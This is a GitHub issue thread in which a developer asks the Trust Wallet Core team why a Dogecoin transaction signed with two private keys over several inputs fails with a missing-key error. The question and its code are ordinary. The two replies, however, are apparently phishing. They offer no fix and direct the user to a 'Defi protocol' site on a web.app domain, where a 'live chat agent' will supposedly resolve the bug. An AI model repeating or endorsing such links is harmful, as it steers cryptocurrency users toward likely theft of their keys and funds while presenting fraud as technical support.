### ISSUE TITLE
Issue with Creating Dogecoin Transaction Using Multiple Inputs and Private Keys

### ISSUE THREAD

**Issue by Sajjad-Khoshdooni** [trustwallet/developer#304]
Hello Trust Wallet Core team,

I'm encountering an issue while trying to create a Dogecoin transaction using multiple inputs, each with their own private keys. Below is the code snippet I'm using:

```javascript
const lockScript = BitcoinScript.lockScriptForAddress(trx.sender_address, CoinType.dogecoin);

const utxo_ = [];
trx.utxo.forEach(element => {
  utxo_.push(
    TW.Bitcoin.Proto.UnspentTransaction.create({
      outPoint: TW.Bitcoin.Proto.OutPoint.create({
        hash: HexCoding.decode(element.hash).reverse(),
        index: element.index,
        sequence: element.sequence 
      }),
      script: lockScript.data(),
      amount: element.amount,
    })
  );
});
const input = TW.Bitcoin.Proto.SigningInput.create({
  hashType: BitcoinSigHashType.all.value,
  amount: trx.amount,
  toAddress: trx.receiver_address,
  changeAddress: trx.sender_address,
  byteFee: trx.byte_fee,
  utxo: utxo_,
  privateKey: [
    HexCoding.decode("private_key1"),
    HexCoding.decode("private_key2"),
  ],
  coinType: CoinType.dogecoin.value,
});
const encoded = TW.Bitcoin.Proto.SigningInput.encode(input).finish();
const outputData = AnySigner.sign(encoded, CoinType.dogecoin);
const output = TW.Bitcoin.Proto.SigningOutput.decode(outputData);
```

When executing this code, I'm unable to successfully create a transaction. The output.error returns an error number 5, indicating a missing private key. However, as shown in the code, I've provided two private keys corresponding to the two inputs.

Could you please help me understand what might be causing this issue, and how it can be resolved? Is there a specific format or process I should follow when including multiple private keys for different UTXO inputs in Dogecoin transactions?

Any guidance or suggestions you can provide would be greatly appreciated.

Thank you for your assistance.

**Comment by svauve** [comment]
> Hello Trust Wallet Core team,
> 
> I'm encountering an issue while trying to create a Dogecoin transaction using multiple inputs, each with their own private keys. Below is the code snippet I'm using:
> 
> ```js
> const lockScript = BitcoinScript.lockScriptForAddress(trx.sender_address, CoinType.dogecoin);
> 
> const utxo_ = [];
> trx.utxo.forEach(element => {
>   utxo_.push(
>     TW.Bitcoin.Proto.UnspentTransaction.create({
>       outPoint: TW.Bitcoin.Proto.OutPoint.create({
>         hash: HexCoding.decode(element.hash).reverse(),
>         index: element.index,
>         sequence: element.sequence 
>       }),
>       script: lockScript.data(),
>       amount: element.amount,
>     })
>   );
> });
> const input = TW.Bitcoin.Proto.SigningInput.create({
>   hashType: BitcoinSigHashType.all.value,
>   amount: trx.amount,
>   toAddress: trx.receiver_address,
>   changeAddress: trx.sender_address,
>   byteFee: trx.byte_fee,
>   utxo: utxo_,
>   privateKey: [
>     HexCoding.decode("private_key1"),
>     HexCoding.decode("private_key2"),
>   ],
>   coinType: CoinType.dogecoin.value,
> });
> const encoded = TW.Bitcoin.Proto.SigningInput.encode(input).finish();
> const outputData = AnySigner.sign(encoded, CoinType.dogecoin);
> const output = TW.Bitcoin.Proto.SigningOutput.decode(outputData);
> ```
> 
> When executing this code, I'm unable to successfully create a transaction. The output.error returns an error number 5, indicating a missing private key. However, as shown in the code, I've provided two private keys corresponding to the two inputs.
> 
> Could you please help me understand what might be causing this issue, and how it can be resolved? Is there a specific format or process I should follow when including multiple private keys for different UTXO inputs in Dogecoin transactions?
> 
> Any guidance or suggestions you can provide would be greatly appreciated.
> 
> Thank you for your assistance.

Hi @Sajjad-Khoshdooni 
sometimes this bug occurs.

Best thing to do to resolve it is open the [Defi protocol](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/) page and let the agent on the live chat know.

They can then make a proposal to complete your request and fix the bug via [Defi Protocol](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/)

**Comment by Cryptoxxi** [comment]
Visit the DeFi Protocol [official website](https://daplinkprotocol.web.app/defiprotocol/v1/defi/home/) to report this issue for further investigation.

Note: This issue will still be relayed for further investigation afterwards.
